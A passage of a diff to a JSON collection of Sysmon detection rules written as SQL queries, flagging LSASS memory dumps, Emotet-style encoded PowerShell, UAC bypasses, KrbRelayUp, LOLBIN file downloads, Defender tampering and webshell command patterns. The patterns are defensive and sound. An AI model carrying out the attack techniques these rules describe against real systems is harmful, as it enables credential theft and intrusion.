AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": 
"70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audio Capture via PowerShell", + "id": 
"932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", - "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate 
administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "LSASS Memory Dumping", + "id": 
"ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", + "tags": [ + "attack.execution", + "attack.t1059" + ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR 
ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the features listed in the rule." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet 
C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% 
krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' 
ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR 
CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE 
'\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 